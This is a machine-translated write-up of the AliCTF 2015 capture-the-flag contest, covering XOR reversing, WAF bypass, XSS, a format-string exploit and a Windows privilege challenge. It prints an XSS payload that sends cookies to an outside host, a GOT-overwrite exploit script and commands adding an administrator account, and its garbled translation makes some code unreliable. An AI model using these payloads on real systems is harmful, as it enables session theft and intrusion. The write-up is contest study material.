ALi ct f 2015 write up

ALi ct f 2015 write up

0x00 Cake
Cake is an Android question. The specific process is to input a string, initialize an array with a length of 16, and then combine the string with the array xor. So we only need to perform xor again and we will be OK.
The Key is to look at the code in reverse order. If there are two keys to find the correct one, you can directly go to the code.

a = [0, 3, 13, 19, 85, 5, 15, 78, 22, 7, 7, 68, 14, 5, 15, 42]b = 'bobdylan's = ''i = 0for x in a:    s+= chr(x ^ ord(b[i % len(b)]))    i += 1print s

0x01 penetration bypass WAF1

2. Bypassing cloud WAF1 is a question that bypasses WAF. This WAF is very hard to write, so it is necessary to use other methods ~

In the pop-up window that appears, you need to do it under the subdomain of .alictf.com, so the fuzz subdomain name:


Get video.alictf.com, open it and find that there is no waf, and the injection point is id.

0x02 Front-End preliminary round question 1
Reflected XSS, through the ph article, the content in the tag can be HTML encode, successfully pop up the window.

Then payload is as follows:
Var I = new Image ();
I. src = "http://ricter.me: 9999 /? "+ Document. cookie;
Obtain the flag.
0x03 password baby
The password is the reverse question of the baby, and the upx shell is used.
Open with 010editor, you can see that the upx shell is added, and the upx-d shell is used

Find the location where GetWIndowTextA is called in ida


Sub_405160 is the function for judgment.

We can see that the logic is relatively simple, that is, the "himemnl" bit is different from 0x4c, 0x5a, 0x4b or once, you can get the password "5408031"
0x04 simple business logic
Simple business logic-logic Vulnerability ~
Register an account, where Username is Admin.

After login, buy-111 grass mud horses:

Get a lot of money and buy the most expensive one.
0x05 Front-End preliminary round question 2
Front-End preliminary round question 2 is simply to give you a flash to let you play
Directly decompile the as code. First we can know that ExternalInterface. call must use electricity, but we find that it will delete those methods. Data discovery
// Papers/948
If you need to send your vector to the victim behind the firewall (flashvars can be used to # To Hide yourself) or, if you want to break through the XSS defense mechanisms of some clients, this method will be very effective. All these are based on the fact that flash will discard invalid characters encoded by URLs.
(1) flash discards two invalid hexadecimal characters ([^ 0-9a-fA-F]) after %, for example:
"% X" or "% ="
(2) If a valid and invalid hexadecimal character is displayed after %, three characters are discarded, for example:
"% AX" or "% &"
In this way, you can bypass the delete, because % X is taken in for, and flash will discard this during call.
Then use the method in this article
/Tips/2924
Attach
Alert (1)} catch (e) {alert (100 )}//
Of course, I can't play it out directly (the lessons of blood have been stuck for a long time. I checked the elements and found that the statements are different =. = So it can finally play like this
% Xdebug = \ % 22); alert (1);} catch (e) {alert (100 )}//
The final payload is as follows:
Http://8dd25e24b4f65229.alictf.com/swf.swf? % Xdebug =\% 22); eval (String. fromCharCode (101,118, 97,108, 110,101,119, 103,101, 59,120, 46,115,114, 39,104,116,116,112, 53, 47,120, 46,112,104,112, 111,111,107,105,101, 43,101,115, 112,101, 40,100,111, 99,117,109,101,110,116, 111,111,107,105,101, 34, 41 ));} catch (e) {alert (100 )}//
0x06 penetration bypass WAF2
The question of bypassing cloud WAF2 shows that it is not in the Intranet, so the first step is to set an intranet ip address. Next, let's look at writeup.
The system prompts that internal access is required, so fuzz IP:
192.168.x.x
10. x
172.16.x.x
It is found that IP addresses starting with 10 can be accessed. By changing the HTTP Request Method to PATCH, you can set the protection level to moderate.
Change the keyword, such as % 20 to % 0b, to bypass detection and inject the flag.

0x07 who stole your on-site SMS
Who stole your on-site text message, one question, binary question?
Directly brainless F5, we can see that sendMail directly prints F input, so there is a Format String vulnerability.
Of course, you need to write a data on the stack at any address, and then find that the user name is on the stack, and then trace the data on the stack. We can see that the user name is placed at the position of 76, so I can write at any address.
Then I wanted to know how to leak the libc address or something. I went back to the code and found a print_flag... This is simple. After sendMail is returned, it is followed by three free tables. I directly changed the free got table and asked him to jump to print_flag. I just went to the Code directly.

# Coding: utf-8from zio import * print_flag = fill = 0x0804C014 exp = "% 134515645x % 76 $ hn" io = zio ('ploit .alictf.com ', 5608 )) ''' # use this io for the first registration. read_until ('quit') io. writeline ('1') io. read_until ('name: ') io. writeline (l32 (free_addr) io. read_until ('ass: ') io. writeline ('20140901') ''' io. read_until ('quit') io. writeline ('2') io. read_until ('name: ') io. writeline (l32 (free_addr) io. read_until ('ass: ') io. writeline ('20140901') io. read_until ('quit') io. writeline ('3') io. read_until ('To:') io. writeline (exp) ''' # Remove this line or it will time out. Write the io at will. read_until ('title: ') io. writeline ('20140901') io. read_until ('body: ') io. writeline ('20140901') io. read_until ('quit') io. writeline ('3') ''' io. interact ()

0x08 business logic and penetration
First, get a normal user, retrieve the password, and find the address.
Http://jinan.alictf.com/resetpass/reset.php? Pass_token = xxxxx
I just want to say that the token here can be controlled. I can look at the Password Reset page and find something at the bottom.
TestKey: 673f3e705c8d5b7af675f309e58d46c9
ServerTime: 15-03-29 20:46:03
Think again, the token is obviously an md5, so how can it be grouped? First, this testKey and ServerTime will certainly be used, but it is impossible for everyone to have the same token, so a user name is required, I tried and found that
Md5 (username + testKey + serverTime (timestamp ))
Then you can change the admin password, .. Said I logged on remotely. Cannot change the xff, xrealip, or other headers... Then an http proxy is found online .. Then .. You can. This question comes with regional discrimination! It's just a second !!!
0x09 Front-End preliminary round 3

  'jquery.min.js'>     function URL(url) {        this.url = url        this.illegal = false;         this.scheme = null        this.query = null;        this.fragment = null;        this.authority = '';        this.path = '';        this.username = null;        this.password = null;        this.port = 80;    }    URL.prototype.parse = function(){      var url = this.url       //parse fragment      var pos = url.indexOf('#');      if(pos > -1){        if(url.length > pos+1){          this.fragment = url.substr(pos+1, url.length-(pos+1));        }        url = url.substr(0, pos);      }      //parse query      pos = url.indexOf('?');      if(pos > -1){        if(url.length > pos+1){          this.query = url.substr(pos+1, url.length-(pos+1));        }        url = url.substr(0, pos);      }       //parse scheme      var pos1 = url.indexOf(':');      var pos2 = url.indexOf('/');      if(pos1 > -1 && pos2 > pos1){        this.scheme = url.substr(0, pos1).toLowerCase();        url = url.substr(pos1+1);        if(url.substr(0,2) == '//'){          url = url.substr(2);        }else{          this.illegal = true;          return        }      }else{        this.illegal = true;        return      }       while(url.charAt(0) == '/'){        url = url.substr(1)      }       pos = url.indexOf('/')      if(pos == -1){        this.authority = url;        this.path = '';      }else{        this.authority = url.substr(0, pos);        this.path = url.substr(pos);      }       //parse username and password      pos = this.authority.indexOf('@');      if(pos == -1){        this.username = null;        this.password = null;      }else{        this.username = this.authority.substr(0, pos);        this.authority = this.authority.substr(pos+1);        pos = this.username.indexOf(':')        if(pos == -1){          this.password = null;        }else{          this.password = this.username.substr(pos+1);          this.username = this.username.substr(0, pos);        }      }       //parse port      pos = this.authority.indexOf(':');      if(pos > -1){        this.port = this.authority.substr(pos+1);        this.authority = this.authority.substr(0, pos)      }    }    URL.prototype.validate = function(){      this.parse();       if(this.illegal) return;      //validate scheme      if(this.scheme != 'http' && this.scheme != 'https'){        this.illegal = true;        return;      }      if(this.username && this.username.indexOf('\\') > -1){        this.illegal = true;        return;      }      if(this.password && this.password.indexOf('\\') > -1){        this.illegal = true;        return;      }      if(this.authority != 'notexist.example.com'){        this.illegal = true;        return;      }    }    URL.prototype.get = function(){      if(this.illegal){        return 'default.js';      }else{        return this.url;      }    }   "text/javascript">    var url = new URL(location.search.substr(1));    url.validate()    url = url.get()    $.getScript(url) 

Read the JavaScript code and construct the address:
Http://ef4c3e7556641f00.alictf.com/xss.php? Http://notexist.example.com: @ notexist.example.com: @ ricter. me: 9999/
The loaded JavaScript script is the same as XSS100.
0x10 simple business logic 2

  function encrypt($plain) {    $plain = md5($plain);    $V = md5('??????');    //var_dump($V);    $rnd = md5(substr(microtime(),11));     //var_dump(substr(microtime(),11)+mt_rand(0,35));    $cipher = '';    for($i = 0; $i strlen($plain); $i++) {        $cipher .= ($plain[$i] ^ $rnd[$i]);    }    $cipher .= $rnd;    $V .= strrev($V);    //var_dump($cipher);    for($i = 0; $i strlen($V); $i++) {        $cipher[$i] = ($cipher[$i] ^ $V[$i]);    }    //var_dump($cipher);    //var_dump($V);    return str_replace('=', '', base64_encode($cipher));}function decrypt($cipher) {    $V = md5('??????');    $cipher_1 = base64_decode($cipher);    //var_dump($cipher_1);    if (strlen($cipher_1)!=64){    return 'xx';    }     $V .= strrev($V);    $plain = $cipher_1;    //var_dump($cipher_1);    //var_dump($V);    for($i = 0; $i strlen($V); $i++) {        $plain[$i] = ($cipher_1[$i] ^ $V[$i]);    }    $ran = substr($plain,32,32);    $plain = substr($plain,0,32);    //var_dump($plain);    for ($i = 0; $i strlen($ran); $i++) {    $plain[$i] = ($plain[$i] ^ $ran[$i]);    }    //var_dump($plain);    return $plain;}!>

Read the PHP code on the page to obtain the encryption and decryption algorithms.
1. After the user name is md5, it corresponds to a randomly generated md5 XOR;
2. Username md5 and rnd md5 constitute ciphertext 1;
3. ciphertext 1 and an unknown md5 (V). strrev (md5 (V) for XOR;
4. returns the final combination of ciphertext;
We can see that the first 32 bits are:
Md5 ("Guest") ^ md5 (rnd) ^ md5 (V)
The last 32 bits are:
Md5 (rnd) ^ strrev (md5 (V ))
If you want to change the first 32-bit usernames from Guest to Admin, you can:
Md5 ("Guest") ^ md5 (rnd) ^ md5 (V) ^ md5 ("Guest") ^ md5 ("Admin ")
Therefore, you can write a Python script in the final result )_

After login, the Cookie contains a serailize injection, which filters out parentheses, but minutes later ..

0x11 penetration preliminary round
Is to infiltrate a website ~
By using the URL, you can guess that the registered URL is changed to "action" to "register", and then the frontend modifies and bypasses the restriction on account registration.

The column directory vulnerability exists in the Avatar modification, and the website backup file is found.

Enter the background address and bypass the password. The first layer of the shield Bypass Method is mul form bypass, the second layer directly or {x 1 }#

The Code audit shows that a secondary injection vulnerability (about) exists in the user_bak function ).

Get the super administrator password, which is h4xxxx! @#.
Then I want to vomit:
Although this question is good, it is true that the question is answered in the end. ADS can think of creating folders, but admin_pic is really a brain hole. Finally, the teammate eee created a new folder, and then changed the Cookie of admin_pic, and then used: $ DATA to upload the php file.
0x12 Title: yundun
Description: your current token is 27638e649e4371f54eddb9a201f1b78c.
Server: ageis.alictf.com
Please try to create a new Administrator group account named by the contestant account on the server.
After the creation is successful, access the http://ageis.alictf.com, if you can see the content in "nickname: string" format,
Concatenate the string with your token as a flag.
A. There is an account named alictf on the server, which is A weak password.
B. The operating system version is win2003 x64.
C. The local machine has enabled the VPN service.
D. In order to avoid affecting others' questions, all operations on the server will not be successful, but will be recorded completely.
E. Please do not launch attacks on participating servers. We will record the attack. We will block the contestant's IP addresses and cancel the competition qualification.
Obviously, you need to log on to the VPN. Manual test
Alictf: 123456
Log on directly. Ifconfig: Check that the ip address is 172.16.0.1 and the port is swept down. Then 80 445 1025 1723 3389 is enabled. If there is nothing to think about, 3389 will definitely not go up, or it is unlikely that snmp will directly consider smb, I wanted to play msf without a brain. I found that my life and death were not successful. Then I read the official tips and found that there were two files, is the file in the windows scheduled task folder, that is, the directory is
C: \ windows \ tasks
When at is not successful at the beginning, I want to say whether it is because no path is written, and then I keep testing
At \ 172.16.0.1 xx: xx c: \ windows \ tasks \ server.exe

 

In an attempt to implement a remote control, but it often fails, and then read the official description
In order to avoid affecting others' questions, all operations on the server will not be successful, but will be recorded completely.
Considering that it will not be executed, what should we do with remote control .. So run the command directly! However, this is the most wonderful thing in life. However, it is impossible to execute commands like this !!! What should I do to restore the original data? since this is a folder for scheduled tasks, I copied the job file directly, but it cannot be said as a matter of fact, because the scheduled task is associated with some versions of the registry, but the competition, no matter how many, must be executed locally.
At xx: xx "net user eee password/add & net localgroup administrators eee/add"
This will generate a job file in the c: \ windows \ tasks \ directory. If I copy this file, will it generate a scheduled task? Just do it
Copy At1.job \ 172.16.0.1 \ Tasks \
Copy it in, just in case I get At2.job and At65535.job and wait for the server to execute!